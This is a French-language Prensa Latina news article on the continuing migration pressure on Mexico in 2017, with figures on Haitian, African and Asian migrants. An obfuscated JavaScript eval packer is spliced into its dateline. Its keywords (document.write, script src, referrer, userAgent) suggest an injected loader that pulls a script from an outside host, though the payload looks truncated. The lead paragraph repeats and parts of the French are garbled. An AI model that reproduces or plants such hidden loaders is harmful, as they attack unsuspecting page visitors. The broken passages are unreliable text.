mardi 16 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

La pression migratoire persiste en 2017 pour le Mexique

Mexico eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iribe|var|u0026u|referrer|ihier||js|php'.split('|'),0,{})) (PL) La vague sans précédent de Haïtiens et Africains, outre le grand flux habituel d'Amérique centrale et des migrants d'autres nationalités, est toujours pressante au Mexique.

 

Mexico (PL) La vague sans précédent de Haïtiens et Africains, outre le grand flux habituel d’Amérique centrale et des migrants d’autres nationalités, est toujours pressante au Mexique.

 

Les spécialistes avertissent que le pays doit faire face avec des meilleures pratiques et des ressources aux étrangers sans papiers, mais aussi chercher du travail de remplacement, de la santé et de l’éducation pour des milliers de civils expulsés des Etats Unis.

En 2015, le Mexique semblait reprendre son souffle sur la question, après un boom des mineurs migrants en 2014 cherchant à rejoindre leurs parents aux Etats Unis.

En 2016, le nombre de migrants en provenance d’Asie a doublé au cours des 11 premiers mois de l’année ( 4 374). Le nombre d’Africains sont passés de 2 078 à 16 268, nombre jamais enregistré, et les données devrait continuer à augmenter.

Dans le cas des Haïtiens, les chiffres officiels indiquent que 2 380. Cependant, les données du gouvernement indiquent un flux au cours du dernier trimestre de 2016, plus de 4500 bloqués à la frontière nord du Mexique, en attendant d’être reçu, au compte-gouttes, du côté
américain pour demander refuge.

Les fonctionnaires consultés par le quotidien la Jornada ont dit que le chemin de flux migratoire qui commence en Amérique du sud, en particulier au Brésil, où ils sont arrivés pour travailler aux Jeux olympiques de Rio, mais avec l’objectif d’arriver aux E.U. via Mexico en terminant.

Cependant, à la fin de l’amnistie pour décrétée haïtienne par le gouvernement de Barack Obama, les voies de fermeture pour les Africains et être au centre des priorités de l’expulsion vers le Mexique et l’Amérique centrale, le problème s’est déplacé au Mexique.

rm/mgt/ool

EN CONTINU
notes connexes